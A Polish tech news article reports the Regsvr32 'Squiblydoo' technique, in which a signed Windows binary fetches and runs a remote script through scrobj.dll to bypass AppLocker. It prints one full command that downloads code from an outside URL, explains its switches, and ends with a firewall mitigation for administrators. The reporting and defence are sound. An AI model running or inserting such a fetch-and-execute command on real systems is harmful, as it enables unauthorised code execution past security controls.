Regsvr32 uruchamia skrypty z Sieci. Jedną komendą złamiesz Windowsa

Strona główna Aktualności
image

O autorze

Być może to nie błąd, lecz po prostu niezamierzona funkcjonalność Windowsa. Na pewno jednak odkryte przez Caseya Smitha działanie systemowego narzędzia Regsvr32, przeznaczonego do rejestrowania plików DLL w Rejestrze wzbudzi spore zainteresowanie zarówno wśród cyberprzestępców, jak i np. uczniów w szkołach. Któż się spodziewał, że pozwoli ono całkowicie obejść systemowe zabezpieczenia i uruchamiać w Windowsie dowolne skrypty?

AppLocker wykorzystywany jest już od czasów wprowadzenia na rynek Windowsa 7 do blokowania użytkownikom dostępu do niepożądanych skryptów i aplikacji – i do tej pory był skutecznym sposobem na zamknięcie „okienek”. Okazuje się jednak, że Regsvr32 (Microsoft Register Server), będący podpisaną przez Microsoft binarką, domyślnie obecną w systemie, pozwala na pobranie z Sieci i uruchomienie dowolnego kodu w JavaScripcie lub VBScripcie i jego uruchomienie. Kod ten zaś może uruchomić dowolną aplikację w systemie, omijając wszelkie zabezpieczenia Windowsa.

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

W przykładzie podanym przez The Register, który jako pierwszy poinformował o tej ciekawej możliwości, regsvr32 wywoływany jest z czterema przełącznikami. /s wycisza komunikaty, /n nakazuje nie korzystać z komponentu DllRegisterServer, /i przekazuje opcjonalny parametr do funkcji DllInstall (tutaj skrypt, który nakazuje uruchomić konsolę CMD.exe) , zaś /u oznacza próbę odrejestrowania obiektu. Widoczna w wywołaniu biblioteka scrobj.dll to Microsoft Script Component Runtime.

Jeśli więc regsvr32 dostanie URL, pod którym znajdować się będzie plik XML z uruchamialnym kodem, to pobierze go po HTTP lub HTTPS i uruchomi, poprzez próbę odrejestrowania pliku DLL. Nie trzeba tu żadnych specjalnych uprawnień, okna są szeroko otwarte dla każdego.

Odkrywca tej „funkcjonalności”, która daje zupełnie nowe możliwości w dziedzinie penetrowania Windowsów, przygotował już cały zbiór skryptów, które można w ten sposób uruchomić. Możecie je znaleźć na GitHubie – pomogą sprawdzić, na ile Wasze systemy są na to podatne.

Znany ekspert od systemów Microsoftu Alex Ionescu zachwyca się odkryciem. To w końcu wbudowane w system zdalne uruchamianie kodu bez uprawnień administratora, które omija mechanizm białych list, nie pozostawia śladów na dysku, nie dotyka Rejestru i można to wszystko w dodatku schować w zaszyfrowanej sesji HTTPS. Jak do tej pory łatek nie ma. Jedyne co pozostaje administratorom, to zablokować dostęp do Sieci dla regsvr32 na poziomie zapory sieciowej.

© dobreprogramy